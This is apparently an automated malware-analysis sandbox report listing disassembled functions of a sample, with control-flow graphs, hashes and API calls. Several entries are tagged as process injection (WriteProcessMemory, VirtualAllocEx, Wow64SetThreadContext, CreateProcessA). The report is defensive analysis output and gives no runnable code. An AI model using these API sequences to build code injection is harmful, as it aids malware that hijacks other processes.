                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a7de7bd27026d07afa9feb073fa10d7a03bcc5b145f06a8cc3532d4311749013
                        • Instruction ID: 69a02e60d0dbe3c85e5937a04ef95e1f70b6d7c00bd869dd2900c2aa98561515
                        • Opcode Fuzzy Hash: a7de7bd27026d07afa9feb073fa10d7a03bcc5b145f06a8cc3532d4311749013
                        • Instruction Fuzzy Hash: FD623571A00219DFDB54DFA8C984A5DBBB2FF88300F1582A8E559AB366CB31ED51CF40
                        Function 071DB048 Relevance: .6, Instructions: 602COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73b3a5cf9d83599259a82e3b071827b149a3459c73b95a61fe02f3aca930c69b
                        • Instruction ID: 7596268a948c1deb49e19b93849dea551a7333b8e8e885696d9a9f81951b035a
                        • Opcode Fuzzy Hash: 73b3a5cf9d83599259a82e3b071827b149a3459c73b95a61fe02f3aca930c69b
                        • Instruction Fuzzy Hash: 7532BCB1B052158FDB29DB69C550BAEBBF6AF89300F11846AE106DB3A1CF34ED01CB51
                        Function 056A0690 Relevance: .3, Instructions: 315COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fe23d2127767b36ecf1b19b59b9a7399057c0a43651f2bb7612f23e7f0b922a6
                        • Instruction ID: 832aa4dde65b6aa4433e0d03f06cdaa12ba5467c7e5ffd8e5900558651301529
                        • Opcode Fuzzy Hash: fe23d2127767b36ecf1b19b59b9a7399057c0a43651f2bb7612f23e7f0b922a6
                        • Instruction Fuzzy Hash: 7E1284B0C817498AD710CF65E94C1893BA1BB49318BD07E19D2615B3E1EBB4166EEF4C
                        Function 056A0680 Relevance: .2, Instructions: 227COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c445caee1bc72070c05a45934304ae79ca8146654e7dc7ed2a5ae584e22de8d0
                        • Instruction ID: 3117cd5314ff39f7eaf914443d6da3a49e390b87239408a204809d93144f35b4
                        • Opcode Fuzzy Hash: c445caee1bc72070c05a45934304ae79ca8146654e7dc7ed2a5ae584e22de8d0
                        • Instruction Fuzzy Hash: 64C1E8B0C817498BD710CF65E8481897BB1BB89318B917F19D1616B3E0EBB4166EEF48
                        Function 071D6214 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 174 71d6214-71d62b5 177 71d62ee-71d630e 174->177 178 71d62b7-71d62c1 174->178 183 71d6347-71d6376 177->183 184 71d6310-71d631a 177->184 178->177 179 71d62c3-71d62c5 178->179 181 71d62e8-71d62eb 179->181 182 71d62c7-71d62d1 179->182 181->177 185 71d62d5-71d62e4 182->185 186 71d62d3 182->186 194 71d63af-71d6469 CreateProcessA 183->194 195 71d6378-71d6382 183->195 184->183 188 71d631c-71d631e 184->188 185->185 187 71d62e6 185->187 186->185 187->181 189 71d6341-71d6344 188->189 190 71d6320-71d632a 188->190 189->183 192 71d632c 190->192 193 71d632e-71d633d 190->193 192->193 193->193 197 71d633f 193->197 206 71d646b-71d6471 194->206 207 71d6472-71d64f8 194->207 195->194 196 71d6384-71d6386 195->196 198 71d63a9-71d63ac 196->198 199 71d6388-71d6392 196->199 197->189 198->194 201 71d6394 199->201 202 71d6396-71d63a5 199->202 201->202 202->202 203 71d63a7 202->203 203->198 206->207 217 71d6508-71d650c 207->217 218 71d64fa-71d64fe 207->218 220 71d651c-71d6520 217->220 221 71d650e-71d6512 217->221 218->217 219 71d6500 218->219 219->217 223 71d6530-71d6534 220->223 224 71d6522-71d6526 220->224 221->220 222 71d6514 221->222 222->220 225 71d6546-71d654d 223->225 226 71d6536-71d653c 223->226 224->223 227 71d6528 224->227 228 71d654f-71d655e 225->228 229 71d6564 225->229 226->225 227->223 228->229 231 71d6565 229->231 231->231
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D6456
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: c28e6d9b9e188800aa78d8135a246b80b492e929621b56d489668a86a1262be2
                        • Instruction ID: ae44d4e90f08cc4e9065bfbd5597e207cbfdacc7382f22277a85250563471462
                        • Opcode Fuzzy Hash: c28e6d9b9e188800aa78d8135a246b80b492e929621b56d489668a86a1262be2
                        • Instruction Fuzzy Hash: A1A15BB1D0025ADFEF15CF68C9417EEBBB2BF48350F1481A9E809A7284DB749985CF91
                        Function 071D6220 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 232 71d6220-71d62b5 234 71d62ee-71d630e 232->234 235 71d62b7-71d62c1 232->235 240 71d6347-71d6376 234->240 241 71d6310-71d631a 234->241 235->234 236 71d62c3-71d62c5 235->236 238 71d62e8-71d62eb 236->238 239 71d62c7-71d62d1 236->239 238->234 242 71d62d5-71d62e4 239->242 243 71d62d3 239->243 251 71d63af-71d6469 CreateProcessA 240->251 252 71d6378-71d6382 240->252 241->240 245 71d631c-71d631e 241->245 242->242 244 71d62e6 242->244 243->242 244->238 246 71d6341-71d6344 245->246 247 71d6320-71d632a 245->247 246->240 249 71d632c 247->249 250 71d632e-71d633d 247->250 249->250 250->250 254 71d633f 250->254 263 71d646b-71d6471 251->263 264 71d6472-71d64f8 251->264 252->251 253 71d6384-71d6386 252->253 255 71d63a9-71d63ac 253->255 256 71d6388-71d6392 253->256 254->246 255->251 258 71d6394 256->258 259 71d6396-71d63a5 256->259 258->259 259->259 260 71d63a7 259->260 260->255 263->264 274 71d6508-71d650c 264->274 275 71d64fa-71d64fe 264->275 277 71d651c-71d6520 274->277 278 71d650e-71d6512 274->278 275->274 276 71d6500 275->276 276->274 280 71d6530-71d6534 277->280 281 71d6522-71d6526 277->281 278->277 279 71d6514 278->279 279->277 282 71d6546-71d654d 280->282 283 71d6536-71d653c 280->283 281->280 284 71d6528 281->284 285 71d654f-71d655e 282->285 286 71d6564 282->286 283->282 284->280 285->286 288 71d6565 286->288 288->288
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D6456
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: d21194ea268527afb7153eed4b76f799c16dcd5c43bdd0abe1fcf8f36f8c67ea
                        • Instruction ID: f6a8eed92d3be9cfe9dbf826b270f18a0e15fcb073c64ed8a6c09b22673470bf
                        • Opcode Fuzzy Hash: d21194ea268527afb7153eed4b76f799c16dcd5c43bdd0abe1fcf8f36f8c67ea
                        • Instruction Fuzzy Hash: 6B914BB1D0021ADFEF15CF68C9417EEBBB2BF48350F1481A9E819A7284DB749985CF91
                        Function 00ADB3F8 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 289 adb3f8-adb417 290 adb419-adb426 call ada728 289->290 291 adb443-adb447 289->291 297 adb43c 290->297 298 adb428 290->298 293 adb449-adb453 291->293 294 adb45b-adb49c 291->294 293->294 300 adb49e-adb4a6 294->300 301 adb4a9-adb4b7 294->301 297->291 344 adb42e call adb6a0 298->344 345 adb42e call adb690 298->345 300->301 302 adb4b9-adb4be 301->302 303 adb4db-adb4dd 301->303 305 adb4c9 302->305 306 adb4c0-adb4c7 call ada734 302->306 308 adb4e0-adb4e7 303->308 304 adb434-adb436 304->297 307 adb578-adb638 304->307 310 adb4cb-adb4d9 305->310 306->310 339 adb63a-adb63d 307->339 340 adb640-adb66b GetModuleHandleW 307->340 311 adb4e9-adb4f1 308->311 312 adb4f4-adb4fb 308->312 310->308 311->312 313 adb4fd-adb505 312->313 314 adb508-adb511 call ada744 312->314 313->314 320 adb51e-adb523 314->320 321 adb513-adb51b 314->321 322 adb525-adb52c 320->322 323 adb541-adb54e 320->323 321->320 322->323 325 adb52e-adb53e call ada754 call ada764 322->325 330 adb571-adb577 323->330 331 adb550-adb56e 323->331 325->323 331->330 339->340 341 adb66d-adb673 340->341 342 adb674-adb688 340->342 341->342 344->304 345->304
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00ADB65E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 6f2564f70942030711a7309fdb62bc3da995691e950d3296885a6fc7819ae99b
                        • Instruction ID: 084cf3e4a920e590cd3f5dfa7723e75bac0a3ff5868e3f51b19071a7e6633ef0
                        • Opcode Fuzzy Hash: 6f2564f70942030711a7309fdb62bc3da995691e950d3296885a6fc7819ae99b
                        • Instruction Fuzzy Hash: E6811270A00B05CFDB24DF29D14179ABBF1FF88704F008A2AD44AD7B51DB74E90A8BA5
                        Function 056A1F24 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 346 56a1f24-56a1f96 347 56a1f98-56a1f9e 346->347 348 56a1fa1-56a1fa8 346->348 347->348 349 56a1faa-56a1fb0 348->349 350 56a1fb3-56a2052 CreateWindowExW 348->350 349->350 352 56a205b-56a2093 350->352 353 56a2054-56a205a 350->353 357 56a20a0 352->357 358 56a2095-56a2098 352->358 353->352 359 56a20a1 357->359 358->357 359->359
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056A2042
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 13ce4a469b5d1f6184e9c78f1dbc27c15e5378b30c95a4e8fd6ad49d9c7877d0
                        • Instruction ID: 56b2448feca7fab59efa59459fcf51f9479eb140d3383ab0728dc61e86ef9524
                        • Opcode Fuzzy Hash: 13ce4a469b5d1f6184e9c78f1dbc27c15e5378b30c95a4e8fd6ad49d9c7877d0
                        • Instruction Fuzzy Hash: DC51EEB1D003499FDB14CFA9C994ADEBFB5BF88310F64822AE819AB210D7759845CF90
                        Function 056A1F30 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 360 56a1f30-56a1f96 361 56a1f98-56a1f9e 360->361 362 56a1fa1-56a1fa8 360->362 361->362 363 56a1faa-56a1fb0 362->363 364 56a1fb3-56a2052 CreateWindowExW 362->364 363->364 366 56a205b-56a2093 364->366 367 56a2054-56a205a 364->367 371 56a20a0 366->371 372 56a2095-56a2098 366->372 367->366 373 56a20a1 371->373 372->371 373->373
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056A2042
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 932f59fecf885fa32f2f77a2b099e327dee6027c371cbfc43ca46d96b2425ebe
                        • Instruction ID: 78c5cae6e5c9a225c1da2e9b41f8f221937f9e054c5453b6385e948f3a7e11bd
                        • Opcode Fuzzy Hash: 932f59fecf885fa32f2f77a2b099e327dee6027c371cbfc43ca46d96b2425ebe
                        • Instruction Fuzzy Hash: B341B0B5D00349DFDB14CF99C984ADEBBB5BF48310F64822AE819AB310D775A845CF90
                        Function 00AD4BB4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 374 ad4bb4-ad60a9 CreateActCtxA 377 ad60ab-ad60b1 374->377 378 ad60b2-ad610c 374->378 377->378 385 ad610e-ad6111 378->385 386 ad611b-ad611f 378->386 385->386 387 ad6121-ad612d 386->387 388 ad6130 386->388 387->388 390 ad6131 388->390 390->390
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AD6099
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: d24e7a37acb8d8a689ad8ba1622c1677dffd150d77fb88920a6bc936cbf76e56
                        • Instruction ID: 1d011f6d4b829daa13e3c4e3b7d8628e30a8317ef40c04543c9f8e42cf678e09
                        • Opcode Fuzzy Hash: d24e7a37acb8d8a689ad8ba1622c1677dffd150d77fb88920a6bc936cbf76e56
                        • Instruction Fuzzy Hash: AF41EEB0C0071DCBEB24DFA9C944B9EBBF5BF88704F20816AD409AB251DBB56945CF90
                        Function 056A4670 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 407 56a4670-56a46ac 408 56a475c-56a477c 407->408 409 56a46b2-56a46b7 407->409 415 56a477f-56a478c 408->415 410 56a470a-56a4742 CallWindowProcW 409->410 411 56a46b9-56a46f0 409->411 412 56a474b-56a475a 410->412 413 56a4744-56a474a 410->413 418 56a46f9-56a4708 411->418 419 56a46f2-56a46f8 411->419 412->415 413->412 418->415 419->418
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 056A4731
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: 394f7ca1fb5b74a2c0a4cd548c47b745164db06dfb21a8f77691dd03b40780cc
                        • Instruction ID: bce5e972c50aeaaffb0ef2c5f8a7b41b3e750812a5826a3e8dab607bfe91e14b
                        • Opcode Fuzzy Hash: 394f7ca1fb5b74a2c0a4cd548c47b745164db06dfb21a8f77691dd03b40780cc
                        • Instruction Fuzzy Hash: 984118B9900349CFDB15CF99C948BAABBF5FF88314F248459D519AB321D7B4A841CFA0
                        Function 00AD5FE7 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 391 ad5fe7-ad60a9 CreateActCtxA 393 ad60ab-ad60b1 391->393 394 ad60b2-ad610c 391->394 393->394 401 ad610e-ad6111 394->401 402 ad611b-ad611f 394->402 401->402 403 ad6121-ad612d 402->403 404 ad6130 402->404 403->404 406 ad6131 404->406 406->406
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AD6099
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 0f4aa64f92ac655c50166625c068105e704163c51a509101f3b4614eff3def72
                        • Instruction ID: 13a18589f3eb0d99a66d731c53c85a78d325077a690f76dfe364de3c4a94ce4d
                        • Opcode Fuzzy Hash: 0f4aa64f92ac655c50166625c068105e704163c51a509101f3b4614eff3def72
                        • Instruction Fuzzy Hash: 1641DFB0C0071DCBEB24DFA9C944B9EBBF5BF48704F20816AD409AB251DBB56946CF90
                        Function 071D5DF9 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 421 71d5df9-71d5dfc 422 71d5dfe-71d5e4b 421->422 423 71d5dd4-71d5dea 421->423 426 71d5e4d-71d5e59 422->426 427 71d5e5b-71d5e8b Wow64SetThreadContext 422->427 426->427 429 71d5e8d-71d5e93 427->429 430 71d5e94-71d5ec4 427->430 429->430
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D5E7E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 3f40007abaad59caaf73dcd855e227b3a1cc158b580e6e63dee990109bad8889
                        • Instruction ID: 823cb50f8851466567475f0cf0052c9434418c75b390ffb0375282d7ada9917e
                        • Opcode Fuzzy Hash: 3f40007abaad59caaf73dcd855e227b3a1cc158b580e6e63dee990109bad8889
                        • Instruction Fuzzy Hash: DF219CB29003098FDB10DFAAC5817EEFBF4EF88364F10842AD518A7240C778A945CFA0
                        Function 071D5F90 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 434 71d5f90-71d5fe6 437 71d5fe8-71d5ff4 434->437 438 71d5ff6-71d6035 WriteProcessMemory 434->438 437->438 440 71d603e-71d606e 438->440 441 71d6037-71d603d 438->441 441->440
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D6028
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 456e2c9c7a2876524d547769411092438ba1997f58e87303e8f0f4e32df3af03
                        • Instruction ID: 6ea14da445cd5f5d637c2e90b0b58f0b8ddb814a3ca36a187c4ea7a6b158d72b
                        • Opcode Fuzzy Hash: 456e2c9c7a2876524d547769411092438ba1997f58e87303e8f0f4e32df3af03
                        • Instruction Fuzzy Hash: 5C2139B190035A9FDB10CFA9C981BDEBBF5FF48310F108429E958A7240D7789954CBA0
                        Function 056E6790 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 445 56e6790-56e67e4 447 56e67ef-56e67fe 445->447 448 56e67e6-56e67ec 445->448 449 56e6803-56e683c DrawTextExW 447->449 450 56e6800 447->450 448->447 451 56e683e-56e6844 449->451 452 56e6845-56e6862 449->452 450->449 451->452
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 056E682F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205956961.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: a20179aae41f58e5926e4221fcb5860158b04b6f93081fe6e656d9963424956a
                        • Instruction ID: 0fe8ba3a7816d60d96a61145f7e86899827d23907ac99d8d130b6930ae6513f3
                        • Opcode Fuzzy Hash: a20179aae41f58e5926e4221fcb5860158b04b6f93081fe6e656d9963424956a
                        • Instruction Fuzzy Hash: E231E2B59012099FDB10CF9AD984A9EBBF4BB58320F14842AE919A7710D775A544CFA0
                        Function 071D5F98 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 464 71d5f98-71d5fe6 466 71d5fe8-71d5ff4 464->466 467 71d5ff6-71d6035 WriteProcessMemory 464->467 466->467 469 71d603e-71d606e 467->469 470 71d6037-71d603d 467->470 470->469
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D6028
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: acb8dcfb4347308ca45104b89539697073c9b4f54f8399d56ca6b264a7f3f45c
                        • Instruction ID: 49bc5db711bd9ef4c95ad0cf6989346b795cf794b17bd21435bd2f1bc509219f
                        • Opcode Fuzzy Hash: acb8dcfb4347308ca45104b89539697073c9b4f54f8399d56ca6b264a7f3f45c
                        • Instruction Fuzzy Hash: 172126B190034A9FDB10CFA9C981BEEBBF5FF48310F10842AE918A7240D7789954CBA4
                        Function 056E6798 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 455 56e6798-56e67e4 456 56e67ef-56e67fe 455->456 457 56e67e6-56e67ec 455->457 458 56e6803-56e683c DrawTextExW 456->458 459 56e6800 456->459 457->456 460 56e683e-56e6844 458->460 461 56e6845-56e6862 458->461 459->458 460->461
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 056E682F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205956961.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: b0369b364eb56e5f3b9707d7b172c3c0662c54fea1dbaf1dd5c099e130e1aeb4
                        • Instruction ID: 1c3e51526b1e6f40f877f572362ad9f19adf2ad605cc05b2fda29fff4671c5d0
                        • Opcode Fuzzy Hash: b0369b364eb56e5f3b9707d7b172c3c0662c54fea1dbaf1dd5c099e130e1aeb4
                        • Instruction Fuzzy Hash: 1921E0B5D012099FDB10CF9AD884A9EFBF4BB58320F14842AE919A7310D774A944CFA0
                        Function 071D6080 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 474 71d6080-71d6115 ReadProcessMemory 478 71d611e-71d614e 474->478 479 71d6117-71d611d 474->479 479->478
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D6108
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 3cc162d5d2577f368854daed5f3c828cd80131d2f953b3ecdb682c7b0df88cef
                        • Instruction ID: b20371d74fc667d3854c5d0393cb725daab6b9726f88dd91fc6c3fd175a0bb9f
                        • Opcode Fuzzy Hash: 3cc162d5d2577f368854daed5f3c828cd80131d2f953b3ecdb682c7b0df88cef
                        • Instruction Fuzzy Hash: 1F2139B18003499FDB10CFAAC941BEEBBF5FF48320F10842AE518A7241C7789954CBA5
                        Function 00ADD6F4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00ADDC96,?,?,?,?,?), ref: 00ADDD57
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 66712022fa73d7a2cd0b8bbbc39e3ae678c48cba6dbd5df9e6c1b17a0108a534
                        • Instruction ID: 0faa7b467987100309de406c91d97d5cf05def7aa398dda4c6c2501494e760a1
                        • Opcode Fuzzy Hash: 66712022fa73d7a2cd0b8bbbc39e3ae678c48cba6dbd5df9e6c1b17a0108a534
                        • Instruction Fuzzy Hash: 6021E3B5900249DFDB10CFAAD984AEEBFF5EB48724F14845AE919A3310D374A950CFA4
                        Function 071D5E00 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D5E7E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 373a6f0069b6aca96e4c06971a6ab867635b2b22fb9e15752bfd378f611e5dc9
                        • Instruction ID: 705f3f250cf14fff1f958eb8497f653926d7233266d190e3c3214da22d31d30c
                        • Opcode Fuzzy Hash: 373a6f0069b6aca96e4c06971a6ab867635b2b22fb9e15752bfd378f611e5dc9
                        • Instruction Fuzzy Hash: 7F2149B19003098FDB10DFAAC5857EEFBF5EF88324F148429D519A7240DB78A944CFA5
                        Function 071D6088 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D6108
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 8e4aaffa62c217c4e70331f0908e98b409940dfd0a4e9eda9688317b87a231c5
                        • Instruction ID: 71fc8c33cfe4cbd36df44d47609802cf6fcd487f595c65da526880358e55fb21
                        • Opcode Fuzzy Hash: 8e4aaffa62c217c4e70331f0908e98b409940dfd0a4e9eda9688317b87a231c5
                        • Instruction Fuzzy Hash: 612128B19003599FDF10DFAAC981BEEBBF5FF88310F108429E518A7241D7789910CBA5
                        Function 071D5ED1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071D5F46
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 5293946bc36cf8b4d00b4fed6dbc89a9dae0c279c94bdeddb28e540962424990
                        • Instruction ID: 7c38a3eef9a454fe4db8957cf1ab5995a5bf68cf7e590102d942e81377754ca8
                        • Opcode Fuzzy Hash: 5293946bc36cf8b4d00b4fed6dbc89a9dae0c279c94bdeddb28e540962424990
